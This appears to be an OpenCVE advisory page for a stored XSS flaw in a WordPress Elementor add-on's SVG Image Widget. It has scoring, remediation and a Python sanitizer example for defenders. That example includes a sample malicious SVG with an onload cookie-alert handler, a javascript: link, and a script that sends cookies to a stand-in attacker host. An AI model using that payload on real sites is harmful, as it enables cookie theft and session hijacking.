Description
The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG Image Widget in versions up to and including 8.4.2. This is due to insufficient input sanitization and output escaping on SVG content fetched from remote URLs in the render_svg() function. The function fetches SVG content using wp_safe_remote_get() and then directly echoes it to the page without any sanitization, only applying a preg_replace() to add attributes to the SVG tag which does not remove malicious event handlers. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript in SVG files that will execute whenever a user accesses a page containing the malicious widget.
Published: 2026-04-08
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Immediate Patch
AI Analysis

Impact

The plugin's SVG Image Widget fetches an SVG from a remote URL and echoes its body directly into the page. The only processing is a regex that adds attributes to the opening <svg> tag, so event-handler attributes (for example onload), <script> elements and javascript: links inside the file pass through untouched. A Contributor-level user can therefore point the widget at a crafted remote SVG containing JavaScript. When any visitor views the page with the widget, the script runs in that visitor's browser within the site's origin, giving the attacker the ability to hijack the victim's session, deface content, or perform further actions in the site context (for example as an administrator who views the page).

Affected Systems

WordPress sites running bdthemes Element Pack – Widgets, Templates & Addons for Elementor version 8.4.2 or earlier are vulnerable. The issue is in the SVG Image Widget's render_svg() function and matters on any deployment where untrusted users hold the Contributor role or higher (for example sites that accept guest authors).

Risk and Exploitability

The CVSS 3.1 base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) indicates moderate severity; the changed scope reflects that the payload executes in the browsers of other users, not in the attacker's own session. The EPSS score is below 1% and the vulnerability is not listed in CISA's KEV catalog. Exploitation requires Contributor or higher privileges to place the malicious widget, but the impact lands on whoever views the affected page, so depending on where the widget is placed it can reach anonymous visitors, other authenticated users, or administrators.

Generated by OpenCVE AI on April 8, 2026 at 10:39 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Element Pack plugin to version 8.4.3 or later as soon as the fixed release is available.
  • If an immediate upgrade is not possible, disable the SVG Image Widget, or restrict it so that Contributor-level users cannot place it or point it at external SVG files.
  • Audit existing pages and templates for SVG Image Widgets that reference external URLs, and verify that any externally loaded SVG content is sanitized (event-handler attributes, <script> elements and javascript: URLs removed) before it is rendered.

Generated by OpenCVE AI on April 8, 2026 at 10:39 UTC.
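As an added example that is not code from the plugin, from bdthemes or from Wordfence, the Python below models the pattern the description gives (a regex that only prepends attributes to the <svg> tag and echoes everything else) beside an allowlist sanitizer of the kind the fetched body needs before it is rendered; it also serves the recommendation above to verify that externally loaded SVG content is sanitized. On a WordPress site the equivalent step is passing the fetched body through wp_kses() with an explicit SVG element and attribute allowlist before echoing it. The sample SVG, the allowlists and every function name here are constructed for this example and do not come from the plugin.

```python
"""Added example, not code from the Element Pack plugin.

Models the described vulnerable pattern (a regex that only adds attributes
to the <svg> tag) next to an allowlist sanitizer that removes the constructs
a remote SVG can use to run JavaScript. The sample SVG, allowlists and
function names are constructed for this example."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialize svg as the default namespace
ET.register_namespace("xlink", XLINK_NS)

# Constructed sample of what a remote SVG referenced by the widget could carry:
# an event-handler attribute, a javascript: link and a <script> element.
MALICIOUS_SVG = (
    f'<svg xmlns="{SVG_NS}" xmlns:xlink="{XLINK_NS}" width="100" height="100">'
    '<circle cx="50" cy="50" r="40" onload="alert(document.cookie)"/>'
    '<a xlink:href="javascript:alert(1)"><text x="10" y="20">click</text></a>'
    "<script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>"
    "</svg>"
)

# Hypothetical allowlists: only what a static image needs. Event handlers
# (onload, onclick, ...), style, foreignObject and script are never listed.
ALLOWED_TAGS = {"svg", "g", "defs", "title", "desc", "path", "circle", "ellipse",
                "rect", "line", "polyline", "polygon", "text", "tspan", "a", "use"}
ALLOWED_ATTRS = {"id", "class", "role", "width", "height", "viewBox", "fill",
                 "stroke", "stroke-width", "d", "cx", "cy", "r", "rx", "ry", "x",
                 "y", "x1", "y1", "x2", "y2", "points", "transform", "href"}


def add_attributes_only(svg: str, extra: str = 'class="bdt-svg" role="img"') -> str:
    """The vulnerable pattern: one substitution on the opening tag, everything
    else (event handlers, <script>, javascript: links) echoed through unchanged."""
    return re.sub(r"<svg\b", f"<svg {extra}", svg, count=1)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def _safe_url(value: str) -> bool:
    """Allow fragments, relative paths and http(s); reject javascript:, data:
    and scheme names split by whitespace or control characters."""
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value)
    return urlsplit(cleaned).scheme.lower() in ("", "http", "https")


def _clean(elem: ET.Element, findings: list) -> None:
    """Recursively drop non-allowlisted attributes, unsafe hrefs and elements."""
    for attr in list(elem.attrib):
        name = _local(attr)
        if name not in ALLOWED_ATTRS:            # catches onload, style, ...
            findings.append(f"removed attribute {name} on <{_local(elem.tag)}>")
            del elem.attrib[attr]
        elif name == "href" and not _safe_url(elem.attrib[attr]):
            findings.append(f"removed unsafe href on <{_local(elem.tag)}>")
            del elem.attrib[attr]
    for child in list(elem):
        if _local(child.tag) not in ALLOWED_TAGS:  # drops <script>, <foreignObject>
            findings.append(f"removed element <{_local(child.tag)}>")
            elem.remove(child)
        else:
            _clean(child, findings)


def sanitize_svg(svg: str):
    """Return (clean_svg, findings). Raises on malformed or non-SVG input,
    which a caller should treat as 'do not render'."""
    if re.search(r"<!(DOCTYPE|ENTITY)", svg, re.I):
        raise ValueError("DTD/entity declarations are not accepted")
    root = ET.fromstring(svg)                   # ET.ParseError on malformed XML
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    findings: list = []
    _clean(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


def render_svg_hardened(svg: str) -> str:
    """Sanitize first, then decorate: the regex now only touches trusted markup."""
    clean, _ = sanitize_svg(svg)
    return add_attributes_only(clean)


if __name__ == "__main__":
    print("vulnerable output:\n", add_attributes_only(MALICIOUS_SVG))
    clean, findings = sanitize_svg(MALICIOUS_SVG)
    print("\nhardened output:\n", render_svg_hardened(MALICIOUS_SVG))
    print("\nfindings:", *findings, sep="\n  ")
```

Running the block prints the vulnerable echo, which still carries onload=, the javascript: link and the <script> element, followed by the hardened output containing only allowlisted markup. The same sanitize_svg() routine, pointed at the SVG bodies that existing widgets reference, doubles as a check for payloads already stored on a site: a non-empty findings list means the file would have executed script under the vulnerable code path.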

Tracking


Advisories

No advisories yet.

History

Wed, 08 Apr 2026 19:45:00 +0000

Type: First Time appeared
Values Removed: (none)
Values Added: Bdthemes; Bdthemes element Pack – Widgets, Templates & Addons For Elementor; Wordpress; Wordpress wordpress

Type: Vendors & Products
Values Removed: (none)
Values Added: Bdthemes; Bdthemes element Pack – Widgets, Templates & Addons For Elementor; Wordpress; Wordpress wordpress

Wed, 08 Apr 2026 17:15:00 +0000

Type: Metrics (ssvc)
Values Removed: (none)
Values Added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 08 Apr 2026 08:15:00 +0000

Type: Description
Values Removed: (none)
Values Added: The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG Image Widget in versions up to and including 8.4.2. This is due to insufficient input sanitization and output escaping on SVG content fetched from remote URLs in the render_svg() function. The function fetches SVG content using wp_safe_remote_get() and then directly echoes it to the page without any sanitization, only applying a preg_replace() to add attributes to the SVG tag which does not remove malicious event handlers. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript in SVG files that will execute whenever a user accesses a page containing the malicious widget.

Type: Title
Values Removed: (none)
Values Added: Element Pack Addons for Elementor <= 8.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via SVG Image Widget

Type: Weaknesses
Values Removed: (none)
Values Added: CWE-79

Type: References
Values Removed: (none)
Values Added: (none listed)

Type: Metrics (cvssV3_1)
Values Removed: (none)
Values Added: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:34:12.756Z

Reserved: 2026-03-23T15:02:38.592Z

Link: CVE-2026-4655

Vulnrichment

Updated: 2026-04-08T14:47:22.770Z

NVD

Status: Deferred

Published: 2026-04-08T08:16:24.407

Modified: 2026-04-24T18:15:28.940

Link: CVE-2026-4655

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-08T19:43:29Z

Weaknesses